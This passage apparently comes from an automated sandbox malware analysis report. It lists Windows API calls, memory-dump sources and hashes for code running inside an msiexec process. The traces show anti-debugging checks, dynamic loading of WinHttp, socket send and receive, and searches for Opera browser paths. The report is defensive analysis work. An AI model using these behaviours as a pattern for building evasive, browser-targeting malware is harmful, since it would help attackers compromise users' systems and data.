                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 214D765E
                                                                                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 214D7665
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CloseFileFind$CreateFirstHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3283578348-0
                                                                                                                                                                                                          • Opcode ID: bc74a36b7c45887f2e6168d205ffe030d82c8ddc173ecc2df2061bd12d7f1877
                                                                                                                                                                                                          • Instruction ID: d2ebb1eeabd8a7fa84a77057977c557cd6f6f1670419c8908317c252e9fcd6ae
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc74a36b7c45887f2e6168d205ffe030d82c8ddc173ecc2df2061bd12d7f1877
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE81D372D002099EDF01CFA4C864FEE7BB5EF25719F600519D90DE7290D7359A45CB60
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 214DAFE1
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 214DB0A9
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,00000017,?), ref: 214DB0C8
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,00000017,?), ref: 214DB0D2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                          • Opcode ID: 76c93ceba45ae7e15f1049c7d308057ccb5cc87addb108dce216c3942d05f881
                                                                                                                                                                                                          • Instruction ID: b7f3ab2296e2f03f94fdb510b455088553bb1b7af9d1e147006953f9b0a756b0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76c93ceba45ae7e15f1049c7d308057ccb5cc87addb108dce216c3942d05f881
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A310AB5C4222D9FCB21DFA5D948ACDBBB8EF05301F1041AAE40DA7210EB355A84CF94
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 21DE2645
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 21DE2710
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 21DE2730
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 21DE273A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 254469556-0
                                                                                                                                                                                                          • Opcode ID: c17283e8f32ff34771a917e69eb51937f95322b51eebc4386f891493d758fb3f
                                                                                                                                                                                                          • Instruction ID: 5e2c7702fd5203d4e8f46398079608f20865d3b83be6f9c245f35603fbc76473
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c17283e8f32ff34771a917e69eb51937f95322b51eebc4386f891493d758fb3f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE313875D85219DFDF11DFA0C9897CDBBB8AF08301F1040AAE40CAB250EBB59B858F54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 214DB18F
                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 214DB19E
                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 214DB1A7
                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 214DB1B4
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                          • Opcode ID: 2954d3657db124bd7b18d3c8cd770512ac3b2350697527267ce6a076489ce11e
                                                                                                                                                                                                          • Instruction ID: ed5b4f4a18c37357fcfb1a33943e6ac43b708058055ac2540d80412f4166db47
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2954d3657db124bd7b18d3c8cd770512ac3b2350697527267ce6a076489ce11e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8114CB6D45108AFDF28CFB8C958A9EB7B5EB09351F51046AD90AE7340EF749A10CB90
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B21
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(21DED1DC,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B2A
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B35
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,21DE2C3B,21DED1DC,00000017), ref: 21DE2B3C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 45607a8f2b0d12cb5d731440f60ccf86f925a061dab798fd601f114794f07fea
                                                                                                                                                                                                          • Instruction ID: 011f3288565ce3696858505cbf28312168a5c461326a05a2a636cbaf8258adb8
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45607a8f2b0d12cb5d731440f60ccf86f925a061dab798fd601f114794f07fea
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CD00271084614EFD7102BE1DD0DA593F28EB046A7F484410F71986451DF7B9566CB55
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,214DB3B8,214F2310,00000017), ref: 214DB29E
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(214F2310,?,214DB3B8,214F2310,00000017), ref: 214DB2A7
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000409,?,214DB3B8,214F2310,00000017), ref: 214DB2B2
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,214DB3B8,214F2310,00000017), ref: 214DB2B9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3231755760-0
                                                                                                                                                                                                          • Opcode ID: 295bde299dbd63cb7fbb809c1f7a8ae4a2d88a6c83c87e371fa90da2116a3d77
                                                                                                                                                                                                          • Instruction ID: 12945bd6021ef721f82408d7312d141b6104968db6bbb5aa50a255df04a7b2e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 295bde299dbd63cb7fbb809c1f7a8ae4a2d88a6c83c87e371fa90da2116a3d77
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82D0CAB3082208FFDB002BE0C80CE083A2AEB08216F008000FB0E82240CE39C420CBA9
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 21DE61DA
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 21DE61E4
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 21DE61F1
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                          • Opcode ID: f33e5e4f9612b1a976dad20a19650e6babd2e4ec17d26bb63a6bcc4a4d9d7bb1
                                                                                                                                                                                                          • Instruction ID: e81238ffff4876755b78350af0827443e90f73535b267b97efce64400a2b683d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f33e5e4f9612b1a976dad20a19650e6babd2e4ec17d26bb63a6bcc4a4d9d7bb1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B31057494122CEBCB61DF64C88878DBBB8BF08311F1041DAE81CA7260EB349F918F54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,214DA5B7), ref: 214DD9C9
                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,214DA5B7), ref: 214DD9D3
                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(00000016,?,?,?,?,?,214DA5B7), ref: 214DD9E0
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                          • Opcode ID: 07409babeb1a7cc53d2febb0ac5013a3b5c1c4f87a4c915ca6b2587ee366a873
                                                                                                                                                                                                          • Instruction ID: e47a516f4d23859c1469fef13c617b87cd1c51e8d2b929c9325b2ecf0cc2fade
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07409babeb1a7cc53d2febb0ac5013a3b5c1c4f87a4c915ca6b2587ee366a873
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F131D6B594121D9BCF21DF64DC88B8CBBB4BF19710F5042DAE91CA7250EB349B818F44
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000,?,21DE2082,21DF2108,0000000C,21DE1F3A,?), ref: 21DE4AD5
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,21DE4A8A,?,21DF2238,0000000C,21DE4BBD,00000000,00000000,?,21DE2082,21DF2108,0000000C,21DE1F3A,?), ref: 21DE4ADC
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 21DE4AEE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148901729490.0000000021DE1000.00000040.00001000.00020000.00000000.sdmp, Offset: 21DE0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901676837.0000000021DE0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148901729490.0000000021DF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_21de0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                                                                                          • Opcode ID: cb4fa0859badd9bc0bc414410a651c62225caf694442aa29dfe477ee193f897c
                                                                                                                                                                                                          • Instruction ID: da3758a95726f937de292f2200e47c0c089a47deba6cd7b51dbdd41a7ed94eff
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb4fa0859badd9bc0bc414410a651c62225caf694442aa29dfe477ee193f897c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBE0BF35040615EFCF026F54CD0DA4A3F6AEF49397F544018F9198B522DB3AE992CB54
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002,00000000), ref: 214E4BDD
                                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,214E4B92,00000000,214F9B98,0000000C,214E4CDA,00000000,00000002,00000000), ref: 214E4BE4
                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 214E4BF6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 521cd59ba0040e30d2f8b0e4be969827c128a830c82c904af4f4bd0e83f1c083
• Instruction ID: a720d231ccdccff9c96db4bbb14e6675747b01678779fe876e7198a5b8f63a96
• Opcode Fuzzy Hash: 521cd59ba0040e30d2f8b0e4be969827c128a830c82c904af4f4bd0e83f1c083
• Instruction Fuzzy Hash: 24E04F35000148AFCF026F10CA0CE483F69EB59753B404018FE0D8B621CF39E952CB80
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A,?), ref: 214DAE36
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-3916222277
• Opcode ID: 60fe57edf2bb24f63e4180f3edad0b688364842e414af12ba53800d9a34d6984
• Instruction ID: 11be32dd1ac334d853b8eaa16fc30ac285b4be1789f03a8ae8fcf8a16c169d67
• Opcode Fuzzy Hash: 60fe57edf2bb24f63e4180f3edad0b688364842e414af12ba53800d9a34d6984
• Instruction Fuzzy Hash: 895138B2D402068FEB14CFA5C4A169ABBF4EB49355F2084AFD41DE7740D7389A54CB50
APIs
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: f7d0d56855cc0e9b491b1ed043c87e6eec9789ffa457e803037bcc30ab8758c8
• Instruction ID: 6e032b3bf241d065e4bc1906961897fd56810d5662ffc719ef6de85f0250ab29
• Opcode Fuzzy Hash: f7d0d56855cc0e9b491b1ed043c87e6eec9789ffa457e803037bcc30ab8758c8
• Instruction Fuzzy Hash: 4CA011B028020A8F83008F388208B0A3AEABB002883808028A808C2200EF288030CB02
APIs
• LoadLibraryW.KERNEL32(winhttp.dll,?,214D2B6F), ref: 214D7316
• GetProcAddress.KERNEL32(00000000,WinHttpOpen), ref: 214D7333
• GetProcAddress.KERNEL32(00000000,WinHttpConnect), ref: 214D7340
• GetProcAddress.KERNEL32(00000000,WinHttpOpenRequest), ref: 214D734D
• GetProcAddress.KERNEL32(00000000,WinHttpSendRequest), ref: 214D735A
• GetProcAddress.KERNEL32(00000000,WinHttpReceiveResponse), ref: 214D7367
• GetProcAddress.KERNEL32(00000000,WinHttpQueryDataAvailable), ref: 214D7374
• GetProcAddress.KERNEL32(00000000,WinHttpReadData), ref: 214D7381
• GetProcAddress.KERNEL32(00000000,WinHttpCloseHandle), ref: 214D738E
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: WinHttpCloseHandle$WinHttpConnect$WinHttpOpen$WinHttpOpenRequest$WinHttpQueryDataAvailable$WinHttpReadData$WinHttpReceiveResponse$WinHttpSendRequest$winhttp.dll
• API String ID: 2238633743-1483618772
• Opcode ID: b1cd8c329b71fbfbed3e930634eeabd168845e2fe58405cd65df44883afea5a2
• Instruction ID: 14c0fa1a62bfd75c9915d697ddee3458f38601882c70242e9efa7d5cf523b05a
• Opcode Fuzzy Hash: b1cd8c329b71fbfbed3e930634eeabd168845e2fe58405cd65df44883afea5a2
• Instruction Fuzzy Hash: C1118C71890318EAEF108F369959F667EE8AB42A49F10123FA50C96394DFBC81A4DF50
APIs
• select.WS2_32(00000000,00000000,00000000,00000000,?), ref: 214D86FE
• select.WS2_32(?,00000001,00000000,00000000,?), ref: 214D8792
• recv.WS2_32(?,?,000005DC,00000000), ref: 214D87C5
• WSAGetLastError.WS2_32 ref: 214D87D2
• WSAGetLastError.WS2_32 ref: 214D87DF
• send.WS2_32(?,?,?,00000000), ref: 214D885F
• WSAGetLastError.WS2_32 ref: 214D8871
• WSAGetLastError.WS2_32 ref: 214D887A
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: ErrorLast$select$recvsend
• String ID: Connection closed!$Connection error!
• API String ID: 4255854023-2305758303
• Opcode ID: 61c7b33afa7d09e870cb8e2b482d3ecdef9cdc321f89b90014666bfbc6d35aa1
• Instruction ID: 2a0b092073651afd2a95abf4fd12b62023c379c7eccda434036a9ab6d1c1f5b0
• Opcode Fuzzy Hash: 61c7b33afa7d09e870cb8e2b482d3ecdef9cdc321f89b90014666bfbc6d35aa1
• Instruction Fuzzy Hash: 72718072A0060BAFDB05CF64DD95B69BBB8BB55700F04427AE90CD6A40DB74EA60CF90
APIs
• PathFileExistsW.SHLWAPI(?,-00000002), ref: 214D65F7
• PathFileExistsW.SHLWAPI(?,00000006), ref: 214D6793
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
• API String ID: 1174141254-3709686828
• Opcode ID: 384bc3ab0ad7df45a767dd409a9c61c56fa6643053c4dff915c00884159724c7
• Instruction ID: 90fa04378ca8dbbe54157d7fcefb33f2324946c0208bc0188758b66a949be7ea
• Opcode Fuzzy Hash: 384bc3ab0ad7df45a767dd409a9c61c56fa6643053c4dff915c00884159724c7
• Instruction Fuzzy Hash: 80914B76D10219AEDF04DFA4DCA4BEEBBB5FF61704F54011DE409A7290EB78A905CB90
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 214DA9A8
• GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 214DA9BE
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 214DA9CC
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 214DA9DA
• CreateEventW.KERNEL32(00000000,?,00000000,00000000), ref: 214DAA24
Strings
Memory Dump Source
• Source File: 00000004.00000002.148900344199.00000000214D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 214D0000, based on PE: true
• Associated: 00000004.00000002.148900292737.00000000214D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.148900344199.00000000214FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021500000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900344199.0000000021502000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000004.00000002.148900581337.0000000021503000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_214d0000_msiexec.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$CreateEventHandleModule
                                                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$kernel32.dll
                                                                                                                                                                                                          • API String ID: 4127270050-758797311
